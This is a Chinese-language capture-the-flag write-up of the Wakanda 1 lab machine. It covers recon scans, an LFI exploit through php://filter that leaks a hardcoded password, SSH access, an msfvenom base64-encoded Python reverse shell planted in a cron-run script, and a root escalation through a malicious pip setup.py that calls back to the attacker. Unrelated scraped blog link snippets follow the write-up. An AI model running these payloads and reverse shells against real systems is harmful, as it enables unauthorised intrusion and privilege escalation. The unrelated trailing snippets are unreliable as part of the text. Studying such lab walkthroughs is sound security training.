Write-Up-wakanda-1
关于
祖传开头
信息收集
- 这里用vm虚拟机可能有一点问题,因为官方的是用vbox虚拟机导出的镜像文件。所以这次使用vbox虚拟机。
➜ ~ ip a show dev vboxnet0
6: vboxnet0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 0a:00:27:00:00:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.56.1/24 brd 192.168.56.255 scope global vboxnet0
valid_lft forever preferred_lft forever
inet6 fe80::800:27ff:fe00:0/64 scope link
valid_lft forever preferred_lft forever
➜ ~ nmap -sn 192.168.56.1/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:00 CST
Nmap scan report for 192.168.56.1
Host is up (0.0011s latency).
Nmap scan report for 192.168.56.101
Host is up (0.00057s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 2.77 seconds
- IP是192.168.56.101,除了开放了RPC服务和以前的没什么太大的变化。从Web入手。
➜ ~ nmap -T4 -A 192.168.56.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-16 20:01 CST
Nmap scan report for 192.168.56.101
Host is up (0.0023s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 40326/tcp status
|_ 100024 1 54014/udp status
3333/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
| 2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
| 256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
|_ 256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
- 主页是一个单页,扫一顿也没发现什么。但是F12发现了
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->,访问http://192.168.56.101/?lang=fr时主页多了一写东西。猜想这是切换语言是要包含本地文件,所以就试了试。发现存在LFI漏洞。和以前的pwnlab_init套路一样。
➜ ~ nikto -h http://192.168.56.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2018-10-16 20:06:38 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7535 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time: 2018-10-16 20:06:57 (GMT8) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
➜ ~ dirb http://192.168.56.101/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 16 20:07:03 2018
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/admin (CODE:200|SIZE:0)
+ http://192.168.56.101/backup (CODE:200|SIZE:0)
+ http://192.168.56.101/index.php (CODE:200|SIZE:1527)
+ http://192.168.56.101/secret (CODE:200|SIZE:0)
+ http://192.168.56.101/server-status (CODE:403|SIZE:302)
+ http://192.168.56.101/shell (CODE:200|SIZE:0)
-----------------
END_TIME: Tue Oct 16 20:07:05 2018
DOWNLOADED: 4612 - FOUND: 6
➜ ~
利用LFI漏洞
- 利用
php://filter/convert.base64-encode/resource获取inde页面的源码再base64解码。
➜ ~ curl "http://192.168.56.101/?lang=php://filter/convert.base64-encode/resource=index"
PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=
登录SSH
- 在源码里找到了
$password ="Niamey4Ever227!!!" ;//I have to remember it,密码找到了,有在主页里找到了Made by[@mamadou](http://192.168.56.101/#)所以用户名是mamadou。登录ssh。
➜ ~ ssh mamadou@192.168.56.101 -p 3333
The authenticity of host '[192.168.56.101]:3333 ([192.168.56.101]:3333)' can't be established.
ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[192.168.56.101]:3333' (ECDSA) to the list of known hosts.
mamadou@192.168.56.101's password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri Aug 3 15:53:29 2018 from 192.168.56.1
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
- 但是发现这并不是系统的bash shell而是一个Python的交互命令行。这好办,都不用我输入
python -c 'import pty;pty.spawn("/bin/bash")',第一个Flag到手。
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty
>>> pty.spawn("/bin/bash")
mamadou@Wakanda1:~$ id
uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou)
mamadou@Wakanda1:~$
mamadou@Wakanda1:~$ ls
flag1.txt
mamadou@Wakanda1:~$ cat flag1.txt
Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
mamadou@Wakanda1:~$
- 在tmp目录发现一个devops用户的一个test文件。
mamadou@Wakanda1:/tmp$ ls -al
total 32
drwxrwxrwt 7 root root 4096 Oct 16 08:28 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .font-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .ICE-unix
-rw-r--r-- 1 devops developer 4 Oct 16 08:24 test
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .Test-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .X11-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .XIM-unix
mamadou@Wakanda1:/tmp$
- 搜索所以属于devops的文件,发现了一个
.antivirus.py文件,然后我又回去看了一下test文件,发现更新时间一直再变,那就有可能是上面的py是会隔一段时间就会执行的。
mamadou@Wakanda1:/tmp$ find / -user devops 2>/dev/null
/srv/.antivirus.py
/tmp/test
/home/devops
/home/devops/.bashrc
/home/devops/.profile
/home/devops/.bash_logout
/home/devops/flag2.txt
mamadou@Wakanda1:/tmp$
mamadou@Wakanda1:/srv$ cat .antivirus.py
open('/tmp/test','w').write('test')
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug 1 17:52 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
-rw-r--rw- 1 devops developer 36 Aug 1 20:08 .antivirus.py
mamadou@Wakanda1:/srv$
mamadou@Wakanda1:/tmp$ ls -al
total 32
drwxrwxrwt 7 root root 4096 Oct 16 08:39 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .font-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .ICE-unix
-rw-r--r-- 1 devops developer 4 Oct 16 08:39 test
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .Test-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .X11-unix
drwxrwxrwt 2 root root 4096 Oct 16 07:49 .XIM-unix
- 生成msf的Python反弹后门,把代码复制到
.antivirus.py里打开msf监听7777端口坐等shell。
➜ ~ msfvenom -p cmd/unix/reverse_python lhost=192.168.56.1 lport=7788 formats py R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 537 bytes
python -c "exec('aW1wb3J0IHNvY2tldCwgICAgICBzdWJwcm9jZXNzLCAgICAgIG9zICAgIDsgICAgICAgICBob3N0PSIxOTIuMTY4LjU2LjEiICAgIDsgICAgICAgICBwb3J0PTc3ODggICAgOyAgICAgICAgIHM9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCwgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgIDsgICAgICAgICBzLmNvbm5lY3QoKGhvc3QsICAgICAgcG9ydCkpICAgIDsgICAgICAgICBvcy5kdXAyKHMuZmlsZW5vKCksICAgICAgMCkgICAgOyAgICAgICAgIG9zLmR1cDIocy5maWxlbm8oKSwgICAgICAxKSAgICA7ICAgICAgICAgb3MuZHVwMihzLmZpbGVubygpLCAgICAgIDIpICAgIDsgICAgICAgICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
- 经过漫长的等待,shell终于弹回来了。第二个Flag到手。
➜ ~ nc -lvp 7788
Connection from 192.168.56.101:50517
id
uid=1001(devops) gid=1002(developer) groups=1002(developer)
python -c 'import pty;pty.spawn("/bin/bash")'
devops@Wakanda1:/$ cd ~
cd ~
devops@Wakanda1:~$ ls
ls
flag2.txt
devops@Wakanda1:~$ cat flag2.txt
cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
devops@Wakanda1:~$
FakePip提权
- pip可以用sudo而且不用输入密码。
devops@Wakanda1:~$ sudo -l
sudo -l
Matching Defaults entries for devops on Wakanda1:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User devops may run the following commands on Wakanda1:
(ALL) NOPASSWD: /usr/bin/pip
devops@Wakanda1:~$
- 项目地址:点我,打开setup.py文件把里面的IP改了就可以了。项目里也有详细的教程。
➜ FakePip git:(master) ✗ php -S 0.0.0.0:4444
PHP 7.2.10 Development Server started at Tue Oct 16 21:40:47 2018
Listening on http://0.0.0.0:4444
Document root is /home/kali-team/GitHub/FakePip
Press Ctrl-C to quit.
[Tue Oct 16 21:41:37 2018] 192.168.56.101:45377 [200]: /setup.py
devops@Wakanda1:~$ wget http://192.168.56.1:4444/setup.py
wget http://192.168.56.1:4444/setup.py
--2018-10-16 09:41:36-- http://192.168.56.1:4444/setup.py
Connecting to 192.168.56.1:4444... connected.
HTTP request sent, awaiting response... 200 OK
Length: 990 [application/octet-stream]
Saving to: ‘setup.py’
setup.py 100%[=====================>] 990 --.-KB/s in 0s
2018-10-16 09:41:36 (81.4 MB/s) - ‘setup.py’ saved [990/990]
devops@Wakanda1:~$ ls
ls
flag2.txt setup.py
- 按照项目教程执行pip安装,再用nc监听等shell。
devops@Wakanda1:~$ sudo /usr/bin/pip install . --upgrade --force-reinstall
sudo /usr/bin/pip install . --upgrade --force-reinstall
Unpacking /home/devops
Running setup.py (path:/tmp/pip-SfNBak-build/setup.py) egg_info for package from file:///home/devops
Installing collected packages: FakePip
Found existing installation: FakePip 0.0.1
Uninstalling FakePip:
Successfully uninstalled FakePip
Running setup.py install for FakePip
- root的Flag到手。
➜ FakePip git:(master) ✗ nc -lvp 6666
Connection from 192.168.56.101:46577
root@Wakanda1:/tmp/pip-SfNBak-build# id
id
uid=0(root) gid=0(root) groups=0(root)
root@Wakanda1:/tmp/pip-SfNBak-build# cd
cd
root@Wakanda1:~# ls
ls
root.txt
root@Wakanda1:~# cat root.txt
cat root.txt
_ _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;:;:;:;:;;:;:;:;:;:;\
\\\:;::;:;:;:;:;::;:;:;:\
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;::;:;:;:;:;::;:;:;:\
\\\;;:;:_:--:_:_:--:_;:;\
\\\_.-" "-._\
\\
\\
\\
\\ Wakanda 1 - by @xMagass
\\
\\
Congratulations You are Root!
821ae63dbe0c573eff8b69d451fb21bc
root@Wakanda1:~#
Write-Up-wakanda-1的更多相关文章
- JavaScript 开发的45个经典技巧
JavaScript是一个绝冠全球的编程语言,可用于Web开发.移动应用开发(PhoneGap.Appcelerator).服务器端开发(Node.js和Wakanda)等等.JavaScript还是 ...
- 【转】超实用的JavaScript技巧及最佳实践
众所周知,JavaScript是一门非常流行的编程语言,开发者用它不仅可以开发出炫丽的Web程序,还可以用它来开发一些移动应用程序(如PhoneGap或Appcelerator),它还有一些服务端实现 ...
- JACASCRIPT--的奇技技巧的44招
JavaScript是一个绝冠全球的编程语言,可用于Web开发.移动应用开发(PhoneGap.Appcelerator).服务器端开发(Node.js和Wakanda)等等.JavaScript还是 ...
- 超实用的JavaScript技巧及最佳实践
众所周知,JavaScript是一门非常流行的编程语言,开发者用它不仅可以开发出炫丽的Web程序,还可以用它来开发一些移动应用程序(如PhoneGap或Appcelerator),它还有一些服务端实现 ...
- JavaScript的一些小技巧(转)
本文是一篇翻译文章,原文信息如下: 原文:45 Useful JavaScript Tips, Tricks and Best Practices 作者:Saad Mousliki JavaScrip ...
- 各式 Web 前端開發工具整理
程式碼編寫工具 (Coding Tools) 工作流程/建置/組合 (Workflow/Builds/Assemblers) lumbar brunch grunt lineman yeoman Ta ...
- Javascript模块化编程系列三: CommonJS & AMD 模块化规范描述
CommonJS Module 规范 CommonJS 的模块化规范描述在Modules/1.1.1 中 目前实现此规格的包有: Yabble,CouchDB,Narwhal (0.2), Wakan ...
- 45种Javascript技巧大全【转藏】
JavaScript是一个绝冠全球的编程语言,可用于Web开发.移动应用开发(PhoneGap.Appcelerator).服务器端开发(Node.js和Wakanda)等等.JavaScript还是 ...
- 45种Javascript技巧大全
JavaScript是一个绝冠全球的编程语言,可用于Web开发.移动应用开发(PhoneGap.Appcelerator).服务器端开发(Node.js和Wakanda)等等.JavaScript还是 ...
- 45 Useful JavaScript Tips, Tricks and Best Practices(有用的JavaScript技巧,技巧和最佳实践)
As you know, JavaScript is the number one programming language in the world, the language of the web ...
随机推荐
- Bugku-CTF之这是一个神奇的登陆框
Day32 这是一个神奇的登陆框 http://123.206.87.240:9001/sql/ flag格式flag{}
- CDH仅完成 0/3 个步骤。首个失败:主机 node6 (id=2) 上的客户端配置 (id=1) 已使用 1 退出,而预期值为 0。
CDH仅完成 0/3 个步骤.首个失败:主机 node6 (id=2) 上的客户端配置 (id=1) 已使用 1 退出,而预期值为 0 javaHome出现了问题 JAVA_HOME并不是根据环境 ...
- SVN代码迁移到GITlab
==================================================================================================== ...
- laravel 事件系统
例子: 打开 VerificationController ,此控制器处理所有邮件认证相关逻辑: app/Http/Controllers/Auth/VerificationController.ph ...
- EditPlus 注册码在线生成
虽然editplus现在不常用,但是它轻便,我还是很喜欢的,推荐一个注册码生成器,真是好好用 http://www.jb51.net/tools/editplus/ 点击链接输入自己想要的用户名,就能 ...
- ES6-形参默认值
在定义一个函数的时候,我们定义了几个函数的参数,但是在调用的时候我们可能并没有传入足够的参数,那么未被满足的参数的值就是undefined,在ES6中如果有这种情况我们可以给形参一个默认值,如果该形参 ...
- js 判断对象的属性是否存在
1.in运算符 (属性名 in 对象) 情况1:对象自身属性 var obj={a:1}; "a" in obj//true 情况2:对象继承的属性 var objA={a:1} ...
- 微信js sdk分享开发摘记java版
绑定域名和引入js的就不说了 废话不说直接上代码 public void share(HttpServletRequest request) throws Exception { StringBuff ...
- 2020 CCPC Wannafly Winter Camp Day1 - I. K小数查询(分块)
题目链接:K小数查询 题意:给你一个长度为$n$序列$A$,有$m$个操作,操作分为两种: 输入$x,y,c$,表示对$i\in[x,y] $,令$A_{i}=min(A_{i},c)$ 输入$x,y ...
- 【STM32H7教程】第56章 STM32H7的DMA2D应用之刷色块,位图和Alpha混合
完整教程下载地址:http://www.armbbs.cn/forum.php?mod=viewthread&tid=86980 第56章 STM32H7的DMA2D应用之刷色块, ...